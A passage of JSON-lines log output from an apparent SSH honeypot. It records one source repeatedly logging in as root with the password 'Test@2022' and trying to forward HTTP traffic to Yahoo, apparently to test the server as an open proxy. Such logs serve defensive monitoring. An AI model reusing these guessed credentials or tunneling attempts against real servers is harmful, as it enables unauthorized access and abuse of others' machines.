r","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:45.866783Z","src_ip":"213.209.150.239","session":"5302df5ef067"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.148374Z","src_ip":"213.209.150.239","session":"5302df5ef067"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":9005,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9005","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.206074Z","session":"5302df5ef067"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.262655Z","src_ip":"213.209.150.239","session":"5302df5ef067"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6886,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6886","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.418994Z","session":"5302df5ef067"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.475724Z","src_ip":"213.209.150.239","session":"5302df5ef067"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.534162Z","src_ip":"213.209.150.239","session":"5302df5ef067"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61710,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e2423df5651","protocol":"ssh","message":"New connection: 213.209.150.239:61710 (1.2.3.4:22) [session: 8e2423df5651]","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.589641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.590481Z","src_ip":"213.209.150.239","session":"8e2423df5651"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.647259Z","src_ip":"213.209.150.239","session":"8e2423df5651"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.931314Z","src_ip":"213.209.150.239","session":"8e2423df5651"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":19141,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:19141","sensor":"my-vps","timestamp":"2025-08-26T00:57:46.989384Z","session":"8e2423df5651"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.046171Z","src_ip":"213.209.150.239","session":"8e2423df5651"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":21332,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21332","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.203070Z","session":"8e2423df5651"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.259860Z","src_ip":"213.209.150.239","session":"8e2423df5651"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.317391Z","src_ip":"213.209.150.239","session":"8e2423df5651"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61753,"dst_ip":"1.2.3.4","dst_port":22,"session":"c10cdef1025a","protocol":"ssh","message":"New connection: 213.209.150.239:61753 (1.2.3.4:22) [session: c10cdef1025a]","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.363655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.364748Z","src_ip":"213.209.150.239","session":"c10cdef1025a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.411871Z","src_ip":"213.209.150.239","session":"c10cdef1025a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.647163Z","src_ip":"213.209.150.239","session":"c10cdef1025a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":14437,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14437","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.696149Z","session":"c10cdef1025a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.743473Z","src_ip":"213.209.150.239","session":"c10cdef1025a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":4848,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4848","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.881586Z","session":"c10cdef1025a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.929044Z","src_ip":"213.209.150.239","session":"c10cdef1025a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:47.977335Z","src_ip":"213.209.150.239","session":"c10cdef1025a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61795,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc1c20562f94","protocol":"ssh","message":"New connection: 213.209.150.239:61795 (1.2.3.4:22) [session: fc1c20562f94]","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.023456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.024585Z","src_ip":"213.209.150.239","session":"fc1c20562f94"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.071762Z","src_ip":"213.209.150.239","session":"fc1c20562f94"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.307101Z","src_ip":"213.209.150.239","session":"fc1c20562f94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":3811,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:3811","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.355386Z","session":"fc1c20562f94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.402721Z","src_ip":"213.209.150.239","session":"fc1c20562f94"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":31847,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:31847","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.537570Z","session":"fc1c20562f94"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.585015Z","src_ip":"213.209.150.239","session":"fc1c20562f94"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.633614Z","src_ip":"213.209.150.239","session":"fc1c20562f94"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61831,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fb74a724f06","protocol":"ssh","message":"New connection: 213.209.150.239:61831 (1.2.3.4:22) [session: 1fb74a724f06]","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.689158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.690352Z","src_ip":"213.209.150.239","session":"1fb74a724f06"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:48.746731Z","src_ip":"213.209.150.239","session":"1fb74a724f06"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.028312Z","src_ip":"213.209.150.239","session":"1fb74a724f06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14446,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14446","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.085912Z","session":"1fb74a724f06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.142738Z","src_ip":"213.209.150.239","session":"1fb74a724f06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":3712,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3712","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.298951Z","session":"1fb74a724f06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.355517Z","src_ip":"213.209.150.239","session":"1fb74a724f06"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.413509Z","src_ip":"213.209.150.239","session":"1fb74a724f06"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":61884,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1170e8eb93a","protocol":"ssh","message":"New connection: 213.209.150.239:61884 (1.2.3.4:22) [session: a1170e8eb93a]","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.469220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.470057Z","src_ip":"213.209.150.239","session":"a1170e8eb93a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.526395Z","src_ip":"213.209.150.239","session":"a1170e8eb93a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.808515Z","src_ip":"213.209.150.239","session":"a1170e8eb93a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":1569,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:1569","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.865847Z","session":"a1170e8eb93a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:49.922531Z","src_ip":"213.209.150.239","session":"a1170e8eb93a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":24655,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24655","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.079017Z","session":"a1170e8eb93a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.136113Z","src_ip":"213.209.150.239","session":"a1170e8eb93a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:50.193587Z","src_ip":"213.209.150.239","session":"a1170e8eb93a"}
